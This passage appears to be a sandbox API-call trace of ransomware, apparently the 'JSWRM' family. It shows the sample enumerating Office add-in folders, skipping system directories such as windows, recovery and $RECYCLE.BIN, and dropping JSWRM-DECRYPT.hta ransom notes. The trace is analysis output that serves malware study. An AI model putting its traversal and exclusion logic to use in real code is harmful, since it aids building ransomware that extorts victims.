lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.121] CloseHandle (hObject=0x338) returned 1 [0123.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0123.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.121] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\gl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\gl\\jswrm-decrypt.hta")) returned 0x20 [0123.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.121] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\gl\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e0a643, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x675bda6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x400b5b6a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231c40 [0123.121] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.121] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e0a643, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x675bda6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x400b5b6a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.121] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.121] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.121] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x400b5b6a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x400b5b6a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x400b5b6a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.121] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.121] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.121] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.121] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.121] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.121] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.121] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.122] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.122] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.122] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0123.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0123.122] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1e0a643, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1e0a643, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf21ea38b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.122] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.122] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.122] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.122] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.122] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.122] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.122] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.122] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.122] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.122] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0123.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0123.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0123.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0123.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x2450c8 [0123.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.123] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5e78ac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5e78ac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5e78ac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.123] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.123] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.123] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.123] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.123] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.123] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.123] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.123] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.123] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.123] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0123.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0123.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0123.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0123.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244d20 [0123.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2450c8 | out: hHeap=0x1e0000) returned 1 [0123.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.123] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x675bda6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x675bda6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6781ff8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.124] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.124] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.124] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.124] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.124] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.124] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.124] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.124] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.124] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.124] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0123.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0123.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0123.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0123.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244e58 [0123.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244d20 | out: hHeap=0x1e0000) returned 1 [0123.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.124] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb67b102, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb67b102, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb6c7584, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8a040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.124] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.126] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.126] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.126] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.126] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.126] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.126] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.126] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.126] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.126] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0123.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d298, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0123.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f158 [0123.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244e58 | out: hHeap=0x1e0000) returned 1 [0123.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.126] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb67b102, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb67b102, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb6c7584, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8a040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0123.126] FindClose (in: hFindFile=0x231c40 | out: hFindFile=0x231c40) returned 1 [0123.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0123.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0123.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.127] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c8cf9c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="he", cAlternateFileName="")) returned 1 [0123.127] lstrcmpiW (lpString1="he", lpString2=".") returned 1 [0123.127] lstrcmpiW (lpString1="he", lpString2="..") returned 1 [0123.127] lstrcmpiW (lpString1="he", lpString2="...") returned 1 [0123.127] lstrcmpiW (lpString1="he", lpString2="windows") returned -1 [0123.127] lstrcmpiW (lpString1="he", lpString2="recovery") returned -1 [0123.127] lstrcmpiW (lpString1="he", lpString2="perflogs") returned -1 [0123.127] lstrcmpiW (lpString1="he", lpString2="documents and settings") returned 1 [0123.127] lstrcmpiW (lpString1="he", lpString2="$RECYCLE.BIN") returned 1 [0123.127] lstrcmpiW (lpString1="he", lpString2="system volume information") returned -1 [0123.127] lstrcmpiW (lpString1="he", lpString2="msocache") returned -1 [0123.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0123.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0123.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.127] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\he\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\he\\jswrm-decrypt.hta")) returned 0xffffffff [0123.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 